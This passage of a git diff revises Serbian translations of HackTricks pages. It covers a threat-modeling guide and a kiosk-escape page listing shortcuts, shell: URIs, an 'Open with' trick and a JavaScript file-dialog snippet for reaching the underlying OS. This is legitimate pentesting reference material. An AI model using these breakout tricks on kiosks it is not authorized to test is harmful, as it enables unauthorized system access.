* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,14 +1,14 @@
|
|||
# Model pretnje
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu informacije**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji kradu informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu besplatno na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -16,12 +16,12 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
## Model pretnji
|
||||
|
||||
Dobrodošli u sveobuhvatni vodič HackTricks-a o Modeliranju pretnji! Krenite u istraživanje ovog ključnog aspekta kibernetičke bezbednosti, gde identifikujemo, razumemo i strategiziramo protiv potencijalnih ranjivosti u sistemu. Ova nit služi kao vodič korak po korak pun realnih primera, korisnog softvera i lako razumljivih objašnjenja. Idealno za početnike i iskusne praktičare koji žele ojačati svoje odbrambene mere kibernetičke bezbednosti.
|
||||
Dobrodošli u sveobuhvatni vodič HackTricks-a o Modeliranju pretnji! Krenite u istraživanje ovog ključnog aspekta sajber bezbednosti, gde identifikujemo, razumemo i strategiziramo protiv potencijalnih ranjivosti u sistemu. Ova nit služi kao vodič korak po korak pun realnih primera, korisnog softvera i lako razumljivih objašnjenja. Idealno za početnike i iskusne praktičare koji žele da ojačaju svoje odbrane sajber bezbednosti.
|
||||
|
||||
### Često korišćeni scenariji
|
||||
|
||||
1. **Razvoj softvera**: Kao deo Sigurnog ciklusa razvoja softvera (SSDLC), modeliranje pretnji pomaže u **identifikaciji potencijalnih izvora ranjivosti** u ranim fazama razvoja.
|
||||
2. **Testiranje proboja**: Standard izvršenja testiranja proboja (PTES) zahteva **modeliranje pretnji kako bi se razumele ranjivosti sistema** pre sprovođenja testa.
|
||||
2. **Testiranje proboja**: Okvir za izvršenje testiranja proboja (PTES) zahteva **modeliranje pretnji kako bi se razumele ranjivosti sistema** pre sprovođenja testa.
|
||||
|
||||
### Model pretnji ukratko
|
||||
|
||||
|
@ -31,28 +31,28 @@ Modeli pretnji često sadrže elemente označene crvenom bojom, simbolizujući p
|
|||
|
||||
### Trijada CIA
|
||||
|
||||
Trijada CIA je široko priznat model u oblasti informacione bezbednosti, označavajući Poverljivost, Integritet i Dostupnost. Ova tri stuba čine osnovu na kojoj se grade mneme mere bezbednosti i politike, uključujući metodologije modeliranja pretnji.
|
||||
Trijada CIA je široko priznat model u oblasti informacione bezbednosti, koja označava Poverljivost, Integritet i Dostupnost. Ova tri stuba čine osnovu na kojoj se grade mneme mere bezbednosti i politike, uključujući metodologije modeliranja pretnji.
|
||||
|
||||
1. **Poverljivost**: Osiguravanje da podaci ili sistem nisu dostupni neovlašćenim osobama. Ovo je centralni aspekt bezbednosti, zahtevajući odgovarajuće kontrole pristupa, enkripciju i druge mere kako bi se sprečili curenje podataka.
|
||||
1. **Poverljivost**: Osigurava da podaci ili sistem nisu dostupni neovlašćenim osobama. Ovo je centralni aspekt bezbednosti, koji zahteva odgovarajuće kontrole pristupa, enkripciju i druge mere kako bi se sprečili curenje podataka.
|
||||
2. **Integritet**: Tačnost, doslednost i pouzdanost podataka tokom njihovog životnog ciklusa. Ovaj princip osigurava da podaci nisu izmenjeni ili manipulisani od strane neovlašćenih strana. Često uključuje kontrolne zbirove, heširanje i druge metode provere podataka.
|
||||
3. **Dostupnost**: Ovo osigurava da podaci i usluge budu dostupni ovlašćenim korisnicima kada je potrebno. Često uključuje redundanciju, toleranciju na greške i konfiguracije visoke dostupnosti kako bi se sistemi održavali čak i u slučaju prekida.
|
||||
|
||||
### Metodologije modeliranja pretnji
|
||||
|
||||
1. **STRIDE**: Razvijen od strane Microsoft-a, STRIDE je akronim za **Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege**. Svaka kategorija predstavlja vrstu pretnje, a ova metodologija se često koristi u fazi dizajna programa ili sistema kako bi se identifikovale potencijalne pretnje.
|
||||
2. **DREAD**: Ovo je još jedna metodologija od Microsoft-a koja se koristi za procenu rizika identifikovanih pretnji. DREAD označava **Damage potential, Reproducibility, Exploitability, Affected users, and Discoverability**. Svaki od ovih faktora se ocenjuje, a rezultat se koristi za prioritetizaciju identifikovanih pretnji.
|
||||
3. **PASTA** (Process for Attack Simulation and Threat Analysis): Ovo je sedmostepena, **rizikom usmerena** metodologija. Uključuje definisanje i identifikaciju sigurnosnih ciljeva, kreiranje tehničkog opsega, dekompoziciju aplikacije, analizu pretnji, analizu ranjivosti i procenu rizika/trijage.
|
||||
1. **STRIDE**: Razvijen od strane Microsoft-a, STRIDE je akronim za **Pretvaranje, Menjanje, Oporicanje, Otkrivanje informacija, Odbijanje usluge i Povećanje privilegija**. Svaka kategorija predstavlja vrstu pretnje, a ova metodologija se često koristi u fazi dizajna programa ili sistema radi identifikacije potencijalnih pretnji.
|
||||
2. **DREAD**: Ovo je još jedna metodologija od Microsoft-a koja se koristi za procenu rizika identifikovanih pretnji. DREAD označava **Potencijal štete, Reproduktivnost, Eksploatabilnost, Pogođeni korisnici i Otkrivanje**. Svaki od ovih faktora se ocenjuje, a rezultat se koristi za prioritetizaciju identifikovanih pretnji.
|
||||
3. **PASTA** (Proces za simulaciju napada i analizu pretnji): Ovo je sedmostepena, **rizikom usmerena** metodologija. Uključuje definisanje i identifikaciju sigurnosnih ciljeva, kreiranje tehničkog opsega, dekompoziciju aplikacije, analizu pretnji, analizu ranjivosti i procenu rizika/trijage.
|
||||
4. **Trike**: Ovo je metodologija zasnovana na riziku koja se fokusira na odbranu imovine. Počinje iz perspektive **upravljanja rizikom** i posmatra pretnje i ranjivosti u tom kontekstu.
|
||||
5. **VAST** (Visual, Agile, and Simple Threat modeling): Ovaj pristup ima za cilj da bude pristupačniji i integriše se u Agile razvojna okruženja. Kombinuje elemente iz drugih metodologija i fokusira se na **vizuelne prikaze pretnji**.
|
||||
6. **OCTAVE** (Operationally Critical Threat, Asset, and Vulnerability Evaluation): Razvijen od strane CERT Coordination Centra, ovaj okvir je usmeren ka **proceni organizacionih rizika umesto specifičnih sistema ili softvera**.
|
||||
5. **VAST** (Vizuelno, Agilno i Jednostavno modeliranje pretnji): Ovaj pristup ima za cilj da bude pristupačniji i integriše se u Agile razvojna okruženja. Kombinuje elemente iz drugih metodologija i fokusira se na **vizuelne prikaze pretnji**.
|
||||
6. **OCTAVE** (Operativno kritična procena pretnji, imovine i ranjivosti): Razvijen od strane CERT Koordinacionog centra, ovaj okvir je usmeren ka **proceni organizacionih rizika umesto specifičnih sistema ili softvera**.
|
||||
|
||||
## Alati
|
||||
|
||||
Postoji nekoliko alata i softverskih rešenja dostupnih koji mogu **pomoći** u kreiranju i upravljanju modelima pretnji. Evo nekoliko koje možete razmotriti.
|
||||
Postoji nekoliko alata i softverskih rešenja dostupnih koji mogu **pomoći** u kreiranju i upravljanju modelima pretnji. Evo nekoliko koje biste mogli razmotriti.
|
||||
|
||||
### [SpiderSuite](https://github.com/3nock/SpiderSuite)
|
||||
|
||||
Napredni višefunkcionalni GUI veb pauk/crawler za profesionalce u oblasti kibernetičke bezbednosti. Spider Suite se može koristiti za mapiranje i analizu površine napada.
|
||||
Napredni višefunkcionalni GUI veb pauk/crawler za profesionalce u oblasti sajber bezbednosti. Spider Suite se može koristiti za mapiranje i analizu površine napada.
|
||||
|
||||
**Korišćenje**
|
||||
|
||||
|
@ -88,21 +88,21 @@ Ponekad može izgledati ovako:
|
|||
|
||||
4. Kreirajte svoj model
|
||||
|
||||
Možete koristiti alate poput SpiderSuite Crawler-a da vam pruže inspiraciju, osnovni model bi izgledao nešto ovako
|
||||
Možete koristiti alate poput SpiderSuite Crawler-a da vam pruže inspiraciju, osnovni model bi izgledao nešto poput ovoga
|
||||
|
||||
<figure><img src="../.gitbook/assets/0_basic_threat_model.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Samo malo objašnjenja o entitetima:
|
||||
|
||||
* Proces (Sam entitet kao što su Veb server ili veb funkcionalnost)
|
||||
* Proces (Entitet sam po sebi kao što su Veb server ili veb funkcionalnost)
|
||||
* Akter (Osoba poput Posetioca veb sajta, Korisnika ili Administratora)
|
||||
* Linija protoka podataka (Indikator interakcije)
|
||||
* Granica poverenja (Različiti segmenti mreže ili opsezi.)
|
||||
* Granica poverenja (Različiti mrežni segmenti ili opsezi.)
|
||||
* Skladište (Mesta gde se podaci čuvaju, poput baza podataka)
|
||||
|
||||
5. Kreirajte pretnju (Korak 1)
|
||||
|
||||
Prvo morate odabrati sloj na koji želite dodati pretnju
|
||||
Prvo morate odabrati sloj kojem želite dodati pretnju
|
||||
|
||||
<figure><img src="../.gitbook/assets/3_threatmodel_chose-threat-layer.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -110,13 +110,13 @@ Sada možete kreirati pretnju
|
|||
|
||||
<figure><img src="../.gitbook/assets/4_threatmodel_create-threat.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Imajte na umu da postoji razlika između Pretnji Aktera i Pretnji Procesa. Ako biste dodali pretnju Akteru, tada ćete moći izabrati samo "Spoofing" i "Repudiation". Međutim, u našem primeru dodajemo pretnju entitetu Procesa pa ćemo videti ovo u okviru kreiranja pretnje:
|
||||
Imajte na umu da postoji razlika između Pretnji aktera i Pretnji procesa. Ako biste dodali pretnju Akteru, tada ćete moći izabrati samo "Pretvaranje" i "Oporicanje". Međutim, u našem primeru dodajemo pretnju entitetu Procesa pa ćemo videti ovo u okviru kreiranja pretnje:
|
||||
|
||||
<figure><img src="../.gitbook/assets/2_threatmodel_type-option.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
6. Gotovo
|
||||
|
||||
Sada bi vaš završeni model trebalo da izgleda nešto ovako. I to je kako napraviti jednostavan model pretnji sa OWASP Threat Dragon-om.
|
||||
Sada bi vaš završeni model trebalo da izgleda nešto poput ovoga. I to je kako napraviti jednostavan model pretnji sa OWASP Threat Dragon.
|
||||
|
||||
<figure><img src="../.gitbook/assets/threat_model_finished.jpg" alt=""><figcaption></figcaption></figure>
|
||||
### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool)
|
||||
|
@ -124,13 +124,13 @@ Sada bi vaš završeni model trebalo da izgleda nešto ovako. I to je kako napra
|
|||
Ovo je besplatan alat od Microsoft-a koji pomaže u pronalaženju pretnji u fazi dizajna softverskih projekata. Koristi STRIDE metodologiju i posebno je pogodan za one koji razvijaju na Microsoft-ovoj platformi.
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
|
||||
|
|
|
@ -4,7 +4,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJEM**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -12,11 +12,11 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
|
@ -46,7 +46,7 @@ Treba da proverite da li možete:
|
|||
|
||||
## Izvršavanje komandi
|
||||
|
||||
Možda **korišćenjem opcije `Otvori sa`** možete otvoriti/izvršiti neku vrstu ljuske.
|
||||
Možda **korišćenjem opcije `Otvori sa`** možete otvoriti/izvršiti neku vrstu shell-a.
|
||||
|
||||
### Windows
|
||||
|
||||
|
@ -81,7 +81,7 @@ _bash, sh, zsh..._ Više ovde: [https://gtfobins.github.io/](https://gtfobins.gi
|
|||
| %TMP% | %USERDOMAIN% | %USERNAME% |
|
||||
| %USERPROFILE% | %WINDIR% | |
|
||||
|
||||
## Preuzmite Vaše binarne fajlove
|
||||
## Preuzimanje vaših binarnih fajlova
|
||||
|
||||
Konzola: [https://sourceforge.net/projects/console/](https://sourceforge.net/projects/console/)\
|
||||
Explorer: [https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/](https://sourceforge.net/projects/explorerplus/files/Explorer%2B%2B/)\
|
||||
|
@ -102,12 +102,12 @@ Editor registra: [https://sourceforge.net/projects/uberregedit/](https://sourcef
|
|||
## Prečice
|
||||
|
||||
* Ljepljive tipke – Pritisnite SHIFT 5 puta
|
||||
* Miš tipke – SHIFT+ALT+NUMLOCK
|
||||
* Mišje tipke – SHIFT+ALT+NUMLOCK
|
||||
* Visoki kontrast – SHIFT+ALT+PRINTSCN
|
||||
* Prekidač tipki – Držite NUMLOCK 5 sekundi
|
||||
* Prekidači tipki – Držite NUMLOCK 5 sekundi
|
||||
* Filter tipki – Držite desni SHIFT 12 sekundi
|
||||
* WINDOWS+F1 – Windows Pretraga
|
||||
* WINDOWS+D – Prikaz radne površi
|
||||
* WINDOWS+D – Prikaz radne površine
|
||||
* WINDOWS+E – Pokreni Windows Explorer
|
||||
* WINDOWS+R – Pokreni
|
||||
* WINDOWS+U – Centar za olakšavanje pristupa
|
||||
|
@ -117,7 +117,7 @@ Editor registra: [https://sourceforge.net/projects/uberregedit/](https://sourcef
|
|||
* CTRL+ALT+DEL – Početni ekran na novijim verzijama Windows-a
|
||||
* F1 – Pomoć F3 – Pretraga
|
||||
* F6 – Traka adrese
|
||||
* F11 – Prebacivanje na celozaslonski režim unutar Internet Explorera
|
||||
* F11 – Prekidač za celozaslonski prikaz u Internet Explorer-u
|
||||
* CTRL+H – Istorija Internet Explorera
|
||||
* CTRL+T – Internet Explorer – Novi tab
|
||||
* CTRL+N – Internet Explorer – Nova stranica
|
||||
|
@ -125,20 +125,20 @@ Editor registra: [https://sourceforge.net/projects/uberregedit/](https://sourcef
|
|||
* CTRL+S – Sačuvaj CTRL+N – Novi RDP / Citrix
|
||||
## Potezi
|
||||
|
||||
* Povucite s leve strane na desnu da biste videli sve otvorene prozore, minimizirajući KIOSK aplikaciju i direktno pristupili celom OS-u;
|
||||
* Povucite s desne strane na levu da biste otvorili Akcioni centar, minimizirajući KIOSK aplikaciju i direktno pristupili celom OS-u;
|
||||
* Povucite s leve strane na desnu da biste videli sve otvorene prozore, minimizirajući KIOSK aplikaciju i direktno pristupajući celom OS-u;
|
||||
* Povucite s desne strane na levu da biste otvorili Akcioni centar, minimizirajući KIOSK aplikaciju i direktno pristupajući celom OS-u;
|
||||
* Povucite odozgo da biste videli traku sa naslovom za aplikaciju otvorenu u režimu punog ekrana;
|
||||
* Povucite odozdo da biste prikazali traku sa zadacima u aplikaciji na punom ekranu.
|
||||
* Povucite odozdo nagore da biste prikazali traku sa zadacima u aplikaciji na punom ekranu.
|
||||
|
||||
## Trikovi za Internet Explorer
|
||||
|
||||
### 'Alat za slike'
|
||||
|
||||
To je traka sa alatima koja se pojavljuje u gornjem levom uglu slike kada se klikne na nju. Moći ćete da Sačuvate, Odštampate, Pošaljete e-poštu, Otvorite "Moje slike" u Exploreru. Kiosk mora koristiti Internet Explorer.
|
||||
To je traka sa alatima koja se pojavljuje u gornjem levom uglu slike kada se klikne na nju. Moći ćete da Sačuvate, Štampate, Pošaljete e-poštu, Otvorite "Moje slike" u Exploreru. Kiosk mora koristiti Internet Explorer.
|
||||
|
||||
### Shell protokol
|
||||
|
||||
Unesite ove URL adrese da biste dobili prikaz Explorer-a:
|
||||
Unesite ove URL-ove da biste dobili prikaz Explorer-a:
|
||||
|
||||
* `shell:Administrative Tools`
|
||||
* `shell:DocumentsLibrary`
|
||||
|
@ -162,18 +162,18 @@ Unesite ove URL adrese da biste dobili prikaz Explorer-a:
|
|||
* `shell:::{{208D2C60-3AEA-1069-A2D7-08002B30309D}}` --> Moj mrežni prostor
|
||||
* `shell:::{871C5380-42A0-1069-A2EA-08002B30309D}` --> Internet Explorer
|
||||
|
||||
## Prikazivanje ekstenzija fajlova
|
||||
## Prikazivanje ekstenzija datoteka
|
||||
|
||||
Proverite ovu stranicu za više informacija: [https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml](https://www.howtohaven.com/system/show-file-extensions-in-windows-explorer.shtml)
|
||||
|
||||
# Trikovi za pretraživače
|
||||
|
||||
Rezervne iKat verzije:
|
||||
Rezervne verzije iKat-a:
|
||||
|
||||
[http://swin.es/k/](http://swin.es/k/)\
|
||||
[http://www.ikat.kronicd.net/](http://www.ikat.kronicd.net)\
|
||||
|
||||
Kreirajte zajednički dijalog pomoću JavaScript-a i pristupite Explorer-u: `document.write('<input/type=file>')`
|
||||
Kreirajte zajednički dijalog pomoću JavaScript-a i pristupite istraživaču datoteka: `document.write('<input/type=file>')`
|
||||
Izvor: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811defa0
|
||||
|
||||
# iPad
|
||||
|
@ -182,9 +182,9 @@ Izvor: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811d
|
|||
|
||||
* Povucite nagore sa četiri (ili pet) prstiju / Dvaput dodirnite dugme Početna: Da biste videli prikaz višestrukih zadataka i promenili aplikaciju
|
||||
|
||||
* Povucite na jednu stranu ili drugu sa četiri ili pet prstiju: Da biste promenili na sledeću/prethodnu aplikaciju
|
||||
* Povucite na jednu ili drugu stranu sa četiri ili pet prstiju: Da biste promenili na sledeću/prethodnu aplikaciju
|
||||
|
||||
* Štipnite ekran sa pet prstiju / Dodirnite dugme Početna / Povucite nagore jednim prstom sa dna ekrana u brzom pokretu ka gore: Da biste pristupili Početnoj stranici
|
||||
* Štipnite ekran sa pet prstiju / Dodirnite dugme Početna / Povucite nagore jednim prstom sa dna ekrana u brzom pokretu nagore: Da biste pristupili Početnoj stranici
|
||||
|
||||
* Povucite jednim prstom sa dna ekrana samo 1-2 inča (sporo): Pojavljuje se dock
|
||||
|
||||
|
@ -192,7 +192,7 @@ Izvor: https://medium.com/@Rend_/give-me-a-browser-ill-give-you-a-shell-de19811d
|
|||
|
||||
* Povucite nadole jednim prstom u gornjem desnom uglu ekrana: Da biste videli kontrolni centar iPad Pro-a
|
||||
|
||||
* Povucite jednim prstom sa leve strane ekrana 1-2 inča: Da biste videli Pregled današnjih događaja
|
||||
* Povucite jednim prstom sa leve strane ekrana 1-2 inča: Da biste videli Prikaz današnjih događaja
|
||||
|
||||
* Brzo povucite jednim prstom sa centra ekrana udesno ili ulevo: Da biste promenili na sledeću/prethodnu aplikaciju
|
||||
|
||||
|
@ -221,7 +221,7 @@ Treba da imate tastaturu za iPad ili adapter za USB tastaturu. Biće prikazane s
|
|||
|
||||
### Sistemske prečice
|
||||
|
||||
Ove prečice su za vizuelna podešavanja i zvučna podešavanja, u zavisnosti od korišćenja iPad-a.
|
||||
Ove prečice su za vizuelna podešavanja i zvučna podešavanja, u zavisnosti od upotrebe iPada.
|
||||
|
||||
| Prečica | Radnja |
|
||||
| -------- | ------------------------------------------------------------------------------ |
|
||||
|
@ -244,8 +244,8 @@ Ove prečice su za vizuelna podešavanja i zvučna podešavanja, u zavisnosti od
|
|||
| ⌘ (Space) | Otvori Spotlight |
|
||||
| ⌘⇥ (Command-Tab) | Lista poslednjih deset korišćenih aplikacija |
|
||||
| ⌘\~ | Idi na poslednju aplikaciju |
|
||||
| ⌘⇧3 (Command-Shift-3) | Snimak ekrana (pojaviće se u donjem levom uglu za čuvanje ili radnju) |
|
||||
| ⌘⇧4 | Snimak ekrana i otvori ga u editoru |
|
||||
| ⌘⇧3 (Command-Shift-3) | Snimak ekrana (pojavljuje se u donjem levom uglu za čuvanje ili radnju) |
|
||||
| ⌘⇧4 | Snimak ekrana i otvori ga u uređivaču |
|
||||
| Pritisnite i držite ⌘ | Lista dostupnih prečica za aplikaciju |
|
||||
| ⌘⌥D (Command-Option/Alt-D) | Prikazuje dock |
|
||||
| ^⌥H (Control-Option-H) | Dugme Početna |
|
||||
|
@ -258,37 +258,37 @@ Ove prečice su za vizuelna podešavanja i zvučna podešavanja, u zavisnosti od
|
|||
| ⌥ ↓ (Opcija-Strelica nadole) | Pomeri nadole |
|
||||
| ⌥↑ (Opcija-Strelica nagore) | Pomeri nagore |
|
||||
| ⌥← ili ⌥→ (Opcija-Leva strelica ili Opcija-Desna strelica) | Pomeri levo ili desno |
|
||||
| ^⌥S (Control-Option-S) | Uključi ili isključi VoiceOver govor |
|
||||
| ^⌥S (Control-Option-S) | Uključi ili isključi govorni izlaz |
|
||||
| ⌘⇧⇥ (Command-Shift-Tab) | Prebaci se na prethodnu aplikaciju |
|
||||
| ⌘⇥ (Command-Tab) | Vrati se na originalnu aplikaciju |
|
||||
| ←+→, zatim Opcija + ← ili Opcija+→ | Navigacija kroz Dock |
|
||||
### Safari prečice
|
||||
|
||||
| Prečica | Radnja |
|
||||
| ----------------------- | ------------------------------------------------- |
|
||||
| ⌘L (Command-L) | Otvori lokaciju |
|
||||
| ----------------------- | ------------------------------------------------ |
|
||||
| ⌘L (Command-L) | Otvori lokaciju |
|
||||
| ⌘T | Otvori novi tab |
|
||||
| ⌘W | Zatvori trenutni tab |
|
||||
| ⌘R | Osveži trenutni tab |
|
||||
| ⌘. | Zaustavi učitavanje trenutnog taba |
|
||||
| ^⇥ | Prebaci se na sledeći tab |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Prebaci se na prethodni tab |
|
||||
| ⌘L | Izaberi tekstualni unos/URL polje za izmenu |
|
||||
| ⌘W | Zatvori trenutni tab |
|
||||
| ⌘R | Osveži trenutni tab |
|
||||
| ⌘. | Zaustavi učitavanje trenutnog taba |
|
||||
| ^⇥ | Prebaci se na sledeći tab |
|
||||
| ^⇧⇥ (Control-Shift-Tab) | Prebaci se na prethodni tab |
|
||||
| ⌘L | Izaberi tekstualni unos/URL polje da ga izmeniš |
|
||||
| ⌘⇧T (Command-Shift-T) | Otvori poslednji zatvoreni tab (može se koristiti više puta) |
|
||||
| ⌘\[ | Vrati se jednu stranicu unazad u istoriji pretrage |
|
||||
| ⌘] | Idi jednu stranicu unapred u istoriji pretrage |
|
||||
| ⌘⇧R | Aktiviraj režim čitača |
|
||||
| ⌘\[ | Vrati se jednu stranicu unazad u istoriji pretrage |
|
||||
| ⌘] | Idi napred jednu stranicu u istoriji pretrage |
|
||||
| ⌘⇧R | Aktiviraj režim čitača |
|
||||
|
||||
### Prečice za Mail
|
||||
|
||||
| Prečica | Radnja |
|
||||
| -------------------------- | ----------------------------- |
|
||||
| ⌘L | Otvori lokaciju |
|
||||
| Prečica | Radnja |
|
||||
| -------------------------- | ---------------------------- |
|
||||
| ⌘L | Otvori lokaciju |
|
||||
| ⌘T | Otvori novi tab |
|
||||
| ⌘W | Zatvori trenutni tab |
|
||||
| ⌘R | Osveži trenutni tab |
|
||||
| ⌘W | Zatvori trenutni tab |
|
||||
| ⌘R | Osveži trenutni tab |
|
||||
| ⌘. | Zaustavi učitavanje trenutnog taba |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Pretraži svoje sanduče |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | Pretraži svoj poštanski sandučić |
|
||||
|
||||
# Reference
|
||||
|
||||
|
@ -298,13 +298,13 @@ Ove prečice su za vizuelna podešavanja i zvučna podešavanja, u zavisnosti od
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -316,10 +316,10 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** Proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili **telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -12,13 +12,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
